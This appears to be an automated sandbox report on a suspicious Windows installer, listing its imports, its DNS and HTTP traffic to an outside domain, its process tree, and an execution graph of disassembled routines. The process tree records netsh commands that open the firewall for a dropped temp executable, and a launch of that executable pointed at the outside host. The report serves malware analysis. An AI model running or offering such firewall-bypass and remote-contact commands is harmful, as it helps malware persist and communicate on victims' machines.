                                SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 29, 2024 09:12:01.322154045 CET4973080192.168.2.423.106.59.18
                                Dec 29, 2024 09:12:01.441945076 CET804973023.106.59.18192.168.2.4
                                Dec 29, 2024 09:12:01.442071915 CET4973080192.168.2.423.106.59.18
                                Dec 29, 2024 09:12:01.442931890 CET4973080192.168.2.423.106.59.18
                                Dec 29, 2024 09:12:01.562490940 CET804973023.106.59.18192.168.2.4
                                Dec 29, 2024 09:12:02.691049099 CET804973023.106.59.18192.168.2.4
                                Dec 29, 2024 09:12:02.695777893 CET4973080192.168.2.423.106.59.18
                                Dec 29, 2024 09:12:02.815665960 CET804973023.106.59.18192.168.2.4
                                Dec 29, 2024 09:12:02.815720081 CET4973080192.168.2.423.106.59.18
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 29, 2024 09:12:00.150595903 CET5837353192.168.2.41.1.1.1
                                Dec 29, 2024 09:12:01.136327982 CET5837353192.168.2.41.1.1.1
                                Dec 29, 2024 09:12:01.311990023 CET53583731.1.1.1192.168.2.4
                                Dec 29, 2024 09:12:01.312009096 CET53583731.1.1.1192.168.2.4
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 29, 2024 09:12:00.150595903 CET192.168.2.41.1.1.10xd26bStandard query (0)www.dantsteinfeld.clickA (IP address)IN (0x0001)false
                                Dec 29, 2024 09:12:01.136327982 CET192.168.2.41.1.1.10xd26bStandard query (0)www.dantsteinfeld.clickA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 29, 2024 09:12:01.311990023 CET1.1.1.1192.168.2.40xd26bNo error (0)www.dantsteinfeld.clickppp84k45ss7ehy8ypic5x.limelightcdn.comCNAME (Canonical name)IN (0x0001)false
                                Dec 29, 2024 09:12:01.311990023 CET1.1.1.1192.168.2.40xd26bNo error (0)ppp84k45ss7ehy8ypic5x.limelightcdn.com23.106.59.18A (IP address)IN (0x0001)false
                                Dec 29, 2024 09:12:01.312009096 CET1.1.1.1192.168.2.40xd26bNo error (0)www.dantsteinfeld.clickppp84k45ss7ehy8ypic5x.limelightcdn.comCNAME (Canonical name)IN (0x0001)false
                                Dec 29, 2024 09:12:01.312009096 CET1.1.1.1192.168.2.40xd26bNo error (0)ppp84k45ss7ehy8ypic5x.limelightcdn.com23.106.59.18A (IP address)IN (0x0001)false
                                • www.dantsteinfeld.click
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.44973023.106.59.18807424C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe
                                TimestampBytes transferredDirectionData
                                Dec 29, 2024 09:12:01.442931890 CET73OUTGET / HTTP/1.1
                                Host: www.dantsteinfeld.click
                                Connection: Keep-Alive
                                Dec 29, 2024 09:12:02.691049099 CET256INHTTP/1.1 200 OK
                                Date: Sun, 29 Dec 2024 08:12:01 GMT
                                Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                X-Powered-By: PHP/5.3.13
                                Content-Length: 2
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html
                                Data Raw: 6f 6b
                                Data Ascii: ok


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:03:11:57
                                Start date:29/12/2024
                                Path:C:\Users\user\Desktop\KYagm8gq5S.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\KYagm8gq5S.exe"
                                Imagebase:0x400000
                                File size:2'666'282 bytes
                                MD5 hash:59586C94EE121385D362A60382217B4E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:1
                                Start time:03:11:57
                                Start date:29/12/2024
                                Path:C:\Windows\SysWOW64\netsh.exe
                                Wow64 process (32bit):true
                                Commandline:netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private
                                Imagebase:0x1560000
                                File size:82'432 bytes
                                MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:03:11:57
                                Start date:29/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:03:11:57
                                Start date:29/12/2024
                                Path:C:\Windows\SysWOW64\netsh.exe
                                Wow64 process (32bit):true
                                Commandline:netsh advfirewall firewall add rule name=nggwslounqxvwf dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private
                                Imagebase:0x1560000
                                File size:82'432 bytes
                                MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:03:11:57
                                Start date:29/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:03:11:58
                                Start date:29/12/2024
                                Path:C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" "http://www.dantsteinfeld.click" "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1519"
                                Imagebase:0xfd0000
                                File size:5'632 bytes
                                MD5 hash:71923BB5EDAFF27984A1A49095554A5F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 3%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:6
                                Start time:03:11:58
                                Start date:29/12/2024
                                Path:C:\Windows\SysWOW64\explorer.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\explorer.exe
                                Imagebase:0x3f0000
                                File size:4'514'184 bytes
                                MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:16.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.6%
                                  Total number of Nodes:1358
                                  Total number of Limit Nodes:29
                                  execution_graph 3061 401bc0 3062 401c11 3061->3062 3063 401bcd 3061->3063 3065 401c16 3062->3065 3066 401c3b GlobalAlloc 3062->3066 3064 4023af 3063->3064 3071 401be4 3063->3071 3068 406591 21 API calls 3064->3068 3079 401c56 3065->3079 3099 406554 lstrcpynW 3065->3099 3080 406591 3066->3080 3070 4023bc 3068->3070 3100 405bb4 3070->3100 3097 406554 lstrcpynW 3071->3097 3072 401c28 GlobalFree 3072->3079 3075 401bf3 3098 406554 lstrcpynW 3075->3098 3077 401c02 3104 406554 lstrcpynW 3077->3104 3084 40659c 3080->3084 3081 4067e3 3082 4067fc 3081->3082 3127 406554 lstrcpynW 3081->3127 3082->3079 3084->3081 3085 4067b4 lstrlenW 3084->3085 3089 4066ad GetSystemDirectoryW 3084->3089 3090 406591 15 API calls 3084->3090 3091 4066c3 GetWindowsDirectoryW 3084->3091 3092 406591 15 API calls 3084->3092 3093 406755 lstrcatW 3084->3093 3096 406725 SHGetPathFromIDListW CoTaskMemFree 3084->3096 3105 406422 3084->3105 3110 406948 GetModuleHandleA 3084->3110 3116 406802 3084->3116 3125 40649b wsprintfW 3084->3125 3126 406554 lstrcpynW 3084->3126 3085->3084 3089->3084 3090->3085 3091->3084 3092->3084 3093->3084 3096->3084 3097->3075 3098->3077 3099->3072 3101 405bc9 3100->3101 3102 405c15 3101->3102 3103 405bdd MessageBoxIndirectW 3101->3103 3102->3079 3103->3102 3104->3079 3128 4063c1 3105->3128 3108 406486 3108->3084 3109 406456 RegQueryValueExW RegCloseKey 3109->3108 3111 406964 3110->3111 3112 40696e GetProcAddress 3110->3112 3132 4068d8 GetSystemDirectoryW 3111->3132 3115 40697d 3112->3115 3114 40696a 3114->3112 3114->3115 3115->3084 3122 40680f 3116->3122 3117 40688a CharPrevW 3118 406885 3117->3118 3118->3117 3120 4068ab 3118->3120 3119 406878 CharNextW 3119->3118 3119->3122 3120->3084 3122->3118 3122->3119 3123 406864 CharNextW 3122->3123 3124 406873 CharNextW 3122->3124 3135 405e50 3122->3135 3123->3122 3124->3119 3125->3084 3126->3084 3127->3082 3129 4063d0 3128->3129 3130 4063d4 3129->3130 3131 4063d9 RegOpenKeyExW 3129->3131 3130->3108 3130->3109 3131->3130 3133 4068fa wsprintfW LoadLibraryExW 3132->3133 3133->3114 3136 405e56 3135->3136 3137 405e6c 3136->3137 3138 405e5d CharNextW 3136->3138 3137->3122 3138->3136 3726 404f40 GetDlgItem GetDlgItem 3727 404f92 7 API calls 3726->3727 3732 4051b7 3726->3732 3728 405039 DeleteObject 3727->3728 3729 40502c SendMessageW 3727->3729 3730 405042 3728->3730 3729->3728 3731 405079 3730->3731 3733 406591 21 API calls 3730->3733 3778 4044d3 3731->3778 3740 405299 3732->3740 3763 405226 3732->3763 3783 404e8e SendMessageW 3732->3783 3738 40505b SendMessageW SendMessageW 3733->3738 3735 405345 3736 405357 3735->3736 3737 40534f SendMessageW 3735->3737 3747 405370 3736->3747 3748 405369 ImageList_Destroy 3736->3748 3758 405380 3736->3758 3737->3736 3738->3730 3739 40508d 3744 4044d3 22 API calls 3739->3744 3740->3735 3745 4052f2 SendMessageW 3740->3745 3769 4051aa 3740->3769 3741 40528b SendMessageW 3741->3740 3765 40509e 3744->3765 3750 405307 SendMessageW 3745->3750 3745->3769 3751 405379 GlobalFree 3747->3751 3747->3758 3748->3747 3749 4054fa 3754 40550c ShowWindow GetDlgItem ShowWindow 3749->3754 3749->3769 3753 40531a 3750->3753 3751->3758 3752 405179 GetWindowLongW SetWindowLongW 3755 405192 3752->3755 3759 40532b SendMessageW 3753->3759 3754->3769 3756 405197 ShowWindow 3755->3756 3757 4051af 3755->3757 3781 404508 SendMessageW 3756->3781 3782 404508 SendMessageW 3757->3782 3758->3749 3773 4053bb 3758->3773 3788 404f0e 3758->3788 3759->3735 3760 405174 3760->3752 3760->3755 3763->3740 3763->3741 3764 4050f1 SendMessageW 3764->3765 3765->3752 3765->3760 3765->3764 3766 405143 SendMessageW 3765->3766 3767 40512f SendMessageW 3765->3767 3766->3765 3767->3765 3800 40453a 3769->3800 3770 4054c5 3771 4054d0 InvalidateRect 3770->3771 3774 4054dc 3770->3774 3771->3774 3772 4053e9 SendMessageW 3777 4053ff 3772->3777 3773->3772 3773->3777 3774->3749 3797 404e49 3774->3797 3776 405473 SendMessageW SendMessageW 3776->3777 3777->3770 3777->3776 3779 406591 21 API calls 3778->3779 3780 4044de SetDlgItemTextW 3779->3780 3780->3739 3781->3769 3782->3732 3784 404eb1 GetMessagePos ScreenToClient SendMessageW 3783->3784 3785 404eed SendMessageW 3783->3785 3786 404eea 3784->3786 3787 404ee5 3784->3787 3785->3787 3786->3785 3787->3763 3814 406554 lstrcpynW 3788->3814 3790 404f21 3815 40649b wsprintfW 3790->3815 3792 404f2b 3793 40140b 2 API calls 3792->3793 3794 404f34 3793->3794 3816 406554 lstrcpynW 3794->3816 3796 404f3b 3796->3773 3817 404d80 3797->3817 3799 404e5e 3799->3749 3801 4045fd 3800->3801 3802 404552 GetWindowLongW 3800->3802 3802->3801 3803 404567 3802->3803 3803->3801 3804 404594 GetSysColor 3803->3804 3805 404597 3803->3805 3804->3805 3806 4045a7 SetBkMode 3805->3806 3807 40459d SetTextColor 3805->3807 3808 4045c5 3806->3808 3809 4045bf GetSysColor 3806->3809 3807->3806 3810 4045d6 3808->3810 3811 4045cc SetBkColor 3808->3811 3809->3808 3810->3801 3812 4045f0 CreateBrushIndirect 3810->3812 3813 4045e9 DeleteObject 3810->3813 3811->3810 3812->3801 3813->3812 3814->3790 3815->3792 3816->3796 3818 404d99 3817->3818 3819 406591 21 API calls 3818->3819 3820 404dfd 3819->3820 3821 406591 21 API calls 3820->3821 3822 404e08 3821->3822 3823 406591 21 API calls 3822->3823 3824 404e1e lstrlenW wsprintfW SetDlgItemTextW 3823->3824 3824->3799 3825 402641 3826 402dcb 21 API calls 3825->3826 3827 402648 3826->3827 3830 406044 GetFileAttributesW CreateFileW 3827->3830 3829 402654 3830->3829 3831 404643 lstrlenW 3832 404662 3831->3832 3833 404664 WideCharToMultiByte 3831->3833 3832->3833 3834 4025c3 3844 402e0b 3834->3844 3837 402da9 21 API calls 3838 4025d6 3837->3838 3839 4025f2 RegEnumKeyW 3838->3839 3840 4025fe RegEnumValueW 3838->3840 3842 402953 3838->3842 3841 402613 RegCloseKey 3839->3841 3840->3841 3841->3842 3845 402dcb 21 API calls 3844->3845 3846 402e22 3845->3846 3847 4063c1 RegOpenKeyExW 3846->3847 3848 4025cd 3847->3848 3848->3837 3849 4049c4 3850 4049f0 3849->3850 3851 404a01 3849->3851 3910 405b98 GetDlgItemTextW 3850->3910 3852 404a0d GetDlgItem 3851->3852 3859 404a6c 3851->3859 3854 404a21 3852->3854 3858 404a35 SetWindowTextW 3854->3858 3862 405ece 4 API calls 3854->3862 3855 404b50 3908 404cff 3855->3908 3912 405b98 GetDlgItemTextW 3855->3912 3856 4049fb 3857 406802 5 API calls 3856->3857 3857->3851 3863 4044d3 22 API calls 3858->3863 3859->3855 3864 406591 21 API calls 3859->3864 3859->3908 3861 40453a 8 API calls 3866 404d13 3861->3866 3867 404a2b 3862->3867 3868 404a51 3863->3868 3869 404ae0 SHBrowseForFolderW 3864->3869 3865 404b80 3870 405f2b 18 API calls 3865->3870 3867->3858 3874 405e23 3 API calls 3867->3874 3871 4044d3 22 API calls 3868->3871 3869->3855 3872 404af8 CoTaskMemFree 3869->3872 3873 404b86 3870->3873 3875 404a5f 3871->3875 3876 405e23 3 API calls 3872->3876 3913 406554 lstrcpynW 3873->3913 3874->3858 3911 404508 SendMessageW 3875->3911 3878 404b05 3876->3878 3882 404b3c SetDlgItemTextW 3878->3882 3885 406591 21 API calls 3878->3885 3880 404b9d 3884 406948 5 API calls 3880->3884 3881 404a65 3883 406948 5 API calls 3881->3883 3882->3855 3883->3859 3896 404ba4 3884->3896 3886 404b24 lstrcmpiW 3885->3886 3886->3882 3888 404b35 lstrcatW 3886->3888 3887 404be5 3914 406554 lstrcpynW 3887->3914 3888->3882 3890 404bec 3891 405ece 4 API calls 3890->3891 3892 404bf2 GetDiskFreeSpaceW 3891->3892 3894 404c16 MulDiv 3892->3894 3897 404c3d 3892->3897 3894->3897 3895 405e6f 2 API calls 3895->3896 3896->3887 3896->3895 3896->3897 3898 404cae 3897->3898 3900 404e49 24 API calls 3897->3900 3899 404cd1 3898->3899 3902 40140b 2 API calls 3898->3902 3915 4044f5 EnableWindow 3899->3915 3901 404c9b 3900->3901 3903 404cb0 SetDlgItemTextW 3901->3903 3904 404ca0 3901->3904 3902->3899 3903->3898 3906 404d80 24 API calls 3904->3906 3906->3898 3907 404ced 3907->3908 3916 40491d 3907->3916 3908->3861 3910->3856 3911->3881 3912->3865 3913->3880 3914->3890 3915->3907 3917 404930 SendMessageW 3916->3917 3918 40492b 3916->3918 3917->3908 3918->3917 3919 4015c8 3920 402dcb 21 API calls 3919->3920 3921 4015cf SetFileAttributesW 3920->3921 3922 4015e1 3921->3922 3392 401fc9 3393 402dcb 21 API calls 3392->3393 3394 401fcf 3393->3394 3395 4055d9 28 API calls 3394->3395 3396 401fd9 3395->3396 3407 405b37 CreateProcessW 3396->3407 3399 402002 CloseHandle 3402 402953 3399->3402 3403 401ff4 3404 402004 3403->3404 3405 401ff9 3403->3405 3404->3399 3415 40649b wsprintfW 3405->3415 3408 401fdf 3407->3408 3409 405b6a CloseHandle 3407->3409 3408->3399 3408->3402 3410 4069f3 WaitForSingleObject 3408->3410 3409->3408 3411 406a0d 3410->3411 3412 406a1f GetExitCodeProcess 3411->3412 3416 406984 3411->3416 3412->3403 3415->3399 3417 4069a1 PeekMessageW 3416->3417 3418 4069b1 WaitForSingleObject 3417->3418 3419 406997 DispatchMessageW 3417->3419 3418->3411 3419->3417 3424 403b4c 3425 403b64 3424->3425 3426 403b56 CloseHandle 3424->3426 3431 403b91 3425->3431 3426->3425 3429 405c60 71 API calls 3430 403b75 3429->3430 3432 403b9f 3431->3432 3433 403b69 3432->3433 3434 403ba4 FreeLibrary GlobalFree 3432->3434 3433->3429 3434->3433 3434->3434 3926 40554d 3927 405571 3926->3927 3928 40555d 3926->3928 3931 405579 IsWindowVisible 3927->3931 3937 405590 3927->3937 3929 405563 3928->3929 3930 4055ba 3928->3930 3932 40451f SendMessageW 3929->3932 3934 4055bf CallWindowProcW 3930->3934 3931->3930 3933 405586 3931->3933 3935 40556d 3932->3935 3936 404e8e 5 API calls 3933->3936 3934->3935 3936->3937 3937->3934 3938 404f0e 4 API calls 3937->3938 3938->3930 3939 40204f 3940 402dcb 21 API calls 3939->3940 3941 402056 3940->3941 3942 406948 5 API calls 3941->3942 3943 402065 3942->3943 3944 402081 GlobalAlloc 3943->3944 3945 4020f1 3943->3945 3944->3945 3946 402095 3944->3946 3947 406948 5 API calls 3946->3947 3948 40209c 3947->3948 3949 406948 5 API calls 3948->3949 3950 4020a6 3949->3950 3950->3945 3954 40649b wsprintfW 3950->3954 3952 4020df 3955 40649b wsprintfW 3952->3955 3954->3952 3955->3945 3956 40254f 3957 402e0b 21 API calls 3956->3957 3958 402559 3957->3958 3959 402dcb 21 API calls 3958->3959 3960 402562 3959->3960 3961 40256d RegQueryValueExW 3960->3961 3964 402953 3960->3964 3962 402593 RegCloseKey 3961->3962 3963 40258d 3961->3963 3962->3964 3963->3962 3967 40649b wsprintfW 3963->3967 3967->3962 3968 4021cf 3969 402dcb 21 API calls 3968->3969 3970 4021d6 3969->3970 3971 402dcb 21 API calls 3970->3971 3972 4021e0 3971->3972 3973 402dcb 21 API calls 3972->3973 3974 4021ea 3973->3974 3975 402dcb 21 API calls 3974->3975 3976 4021f4 3975->3976 3977 402dcb 21 API calls 3976->3977 3978 4021fe 3977->3978 3979 40223d CoCreateInstance 3978->3979 3980 402dcb 21 API calls 3978->3980 3983 40225c 3979->3983 3980->3979 3981 401423 28 API calls 3982 40231b 3981->3982 3983->3981 3983->3982 3984 403fd4 3985 403fec 3984->3985 3986 40414d 3984->3986 3985->3986 3989 403ff8 3985->3989 3987 40419e 3986->3987 3988 40415e GetDlgItem GetDlgItem 3986->3988 3991 4041f8 3987->3991 4003 401389 2 API calls 3987->4003 3990 4044d3 22 API calls 3988->3990 3992 404003 SetWindowPos 3989->3992 3993 404016 3989->3993 3996 404188 SetClassLongW 3990->3996 3997 40451f SendMessageW 3991->3997 4009 404148 3991->4009 3992->3993 3994 404061 3993->3994 3995 40401f ShowWindow 3993->3995 4000 404080 3994->4000 4001 404069 DestroyWindow 3994->4001 3998 40410b 3995->3998 3999 40403f GetWindowLongW 3995->3999 4002 40140b 2 API calls 3996->4002 4025 40420a 3997->4025 4008 40453a 8 API calls 3998->4008 3999->3998 4004 404058 ShowWindow 3999->4004 4005 404085 SetWindowLongW 4000->4005 4006 404096 4000->4006 4054 40445c 4001->4054 4002->3987 4007 4041d0 4003->4007 4004->3994 4005->4009 4006->3998 4012 4040a2 GetDlgItem 4006->4012 4007->3991 4013 4041d4 SendMessageW 4007->4013 4008->4009 4010 40140b 2 API calls 4010->4025 4011 40445e DestroyWindow EndDialog 4011->4054 4015 4040d0 4012->4015 4016 4040b3 SendMessageW IsWindowEnabled 4012->4016 4013->4009 4014 40448d ShowWindow 4014->4009 4018 4040dd 4015->4018 4019 4040f0 4015->4019 4020 404124 SendMessageW 4015->4020 4028 4040d5 4015->4028 4016->4009 4016->4015 4017 406591 21 API calls 4017->4025 4018->4020 4018->4028 4023 4040f8 4019->4023 4024 40410d 4019->4024 4020->3998 4022 4044d3 22 API calls 4022->4025 4026 40140b 2 API calls 4023->4026 4027 40140b 2 API calls 4024->4027 4025->4009 4025->4010 4025->4011 4025->4017 4025->4022 4029 4044d3 22 API calls 4025->4029 4045 40439e DestroyWindow 4025->4045 4026->4028 4027->4028 4028->3998 4055 4044ac 4028->4055 4030 404285 GetDlgItem 4029->4030 4031 4042a2 ShowWindow EnableWindow 4030->4031 4032 40429a 4030->4032 4058 4044f5 EnableWindow 4031->4058 4032->4031 4034 4042cc EnableWindow 4035 4042e0 4034->4035 4036 4042e5 GetSystemMenu EnableMenuItem SendMessageW 4035->4036 4039 403fb5 22 API calls 4035->4039 4059 404508 SendMessageW 4035->4059 4060 406554 lstrcpynW 4035->4060 4036->4035 4037 404315 SendMessageW 4036->4037 4037->4035 4039->4035 4041 404344 lstrlenW 4042 406591 21 API calls 4041->4042 4043 40435a SetWindowTextW 4042->4043 4044 401389 2 API calls 4043->4044 4044->4025 4046 4043b8 CreateDialogParamW 4045->4046 4045->4054 4047 4043eb 4046->4047 4046->4054 4048 4044d3 22 API calls 4047->4048 4049 4043f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4048->4049 4050 401389 2 API calls 4049->4050 4051 40443c 4050->4051 4051->4009 4052 404444 ShowWindow 4051->4052 4053 40451f SendMessageW 4052->4053 4053->4054 4054->4009 4054->4014 4056 4044b3 4055->4056 4057 4044b9 SendMessageW 4055->4057 4056->4057 4057->3998 4058->4034 4059->4035 4060->4041 4061 401a55 4062 402dcb 21 API calls 4061->4062 4063 401a5e ExpandEnvironmentStringsW 4062->4063 4064 401a72 4063->4064 4066 401a85 4063->4066 4065 401a77 lstrcmpW 4064->4065 4064->4066 4065->4066 4067 4014d7 4068 402da9 21 API calls 4067->4068 4069 4014dd Sleep 4068->4069 4071 402c4f 4069->4071 4077 4023d7 4078 4023e5 4077->4078 4079 4023df 4077->4079 4080 4023f3 4078->4080 4082 402dcb 21 API calls 4078->4082 4081 402dcb 21 API calls 4079->4081 4083 402dcb 21 API calls 4080->4083 4085 402401 4080->4085 4081->4078 4082->4080 4083->4085 4084 402dcb 21 API calls 4086 40240a WritePrivateProfileStringW 4084->4086 4085->4084 4087 402459 4088 402461 4087->4088 4089 40248c 4087->4089 4091 402e0b 21 API calls 4088->4091 4090 402dcb 21 API calls 4089->4090 4092 402493 4090->4092 4093 402468 4091->4093 4098 402e89 4092->4098 4095 402dcb 21 API calls 4093->4095 4096 4024a0 4093->4096 4097 402479 RegDeleteValueW RegCloseKey 4095->4097 4097->4096 4099 402e96 4098->4099 4100 402e9d 4098->4100 4099->4096 4100->4099 4102 402ece 4100->4102 4103 4063c1 RegOpenKeyExW 4102->4103 4104 402efc 4103->4104 4105 402f0c RegEnumValueW 4104->4105 4109 402f2f 4104->4109 4113 402fa6 4104->4113 4106 402f96 RegCloseKey 4105->4106 4105->4109 4106->4113 4107 402f6b RegEnumKeyW 4108 402f74 RegCloseKey 4107->4108 4107->4109 4110 406948 5 API calls 4108->4110 4109->4106 4109->4107 4109->4108 4111 402ece 6 API calls 4109->4111 4112 402f84 4110->4112 4111->4109 4112->4113 4114 402f88 RegDeleteKeyW 4112->4114 4113->4099 4114->4113 4115 40175a 4116 402dcb 21 API calls 4115->4116 4117 401761 SearchPathW 4116->4117 4118 40177c 4117->4118 4119 401d5d 4120 402da9 21 API calls 4119->4120 4121 401d64 4120->4121 4122 402da9 21 API calls 4121->4122 4123 401d70 GetDlgItem 4122->4123 4124 40265d 4123->4124 4125 402663 4126 402692 4125->4126 4127 402677 4125->4127 4129 4026c2 4126->4129 4130 402697 4126->4130 4128 402da9 21 API calls 4127->4128 4131 40267e 4128->4131 4133 402dcb 21 API calls 4129->4133 4132 402dcb 21 API calls 4130->4132 4138 4026f6 4131->4138 4141 40270c 4131->4141 4143 406125 SetFilePointer 4131->4143 4134 40269e 4132->4134 4135 4026c9 lstrlenW 4133->4135 4142 406576 WideCharToMultiByte 4134->4142 4135->4131 4137 4026b2 lstrlenA 4137->4131 4139 4060f6 WriteFile 4138->4139 4138->4141 4139->4141 4142->4137 4144 406141 4143->4144 4145 406159 4143->4145 4146 4060c7 ReadFile 4144->4146 4145->4138 4147 40614d 4146->4147 4147->4145 4148 406162 SetFilePointer 4147->4148 4149 40618a SetFilePointer 4147->4149 4148->4149 4150 40616d 4148->4150 4149->4145 4151 4060f6 WriteFile 4150->4151 4151->4145 4152 403be4 4153 403bef 4152->4153 4154 403bf3 4153->4154 4155 403bf6 GlobalAlloc 4153->4155 4155->4154 3244 4015e6 3245 402dcb 21 API calls 3244->3245 3246 4015ed 3245->3246 3263 405ece CharNextW CharNextW 3246->3263 3248 401656 3250 401688 3248->3250 3251 40165b 3248->3251 3249 405e50 CharNextW 3260 4015f6 3249->3260 3253 401423 28 API calls 3250->3253 3275 401423 3251->3275 3259 401680 3253->3259 3257 40166f SetCurrentDirectoryW 3257->3259 3260->3248 3260->3249 3261 40163c GetFileAttributesW 3260->3261 3269 405b1f 3260->3269 3272 405aa8 CreateDirectoryW 3260->3272 3279 405b02 CreateDirectoryW 3260->3279 3261->3260 3264 405eeb 3263->3264 3267 405efd 3263->3267 3266 405ef8 CharNextW 3264->3266 3264->3267 3265 405f21 3265->3260 3266->3265 3267->3265 3268 405e50 CharNextW 3267->3268 3268->3267 3270 406948 5 API calls 3269->3270 3271 405b26 3270->3271 3271->3260 3273 405af4 3272->3273 3274 405af8 GetLastError 3272->3274 3273->3260 3274->3273 3276 4055d9 28 API calls 3275->3276 3277 401431 3276->3277 3278 406554 lstrcpynW 3277->3278 3278->3257 3280 405b12 3279->3280 3281 405b16 GetLastError 3279->3281 3280->3260 3281->3280 3282 401966 3283 401968 3282->3283 3284 402dcb 21 API calls 3283->3284 3285 40196d 3284->3285 3288 405c60 3285->3288 3324 405f2b 3288->3324 3291 405c88 DeleteFileW 3320 401976 3291->3320 3292 405c9f 3297 405dbf 3292->3297 3338 406554 lstrcpynW 3292->3338 3294 405cc5 3295 405cd8 3294->3295 3296 405ccb lstrcatW 3294->3296 3339 405e6f lstrlenW 3295->3339 3298 405cde 3296->3298 3300 4068b1 2 API calls 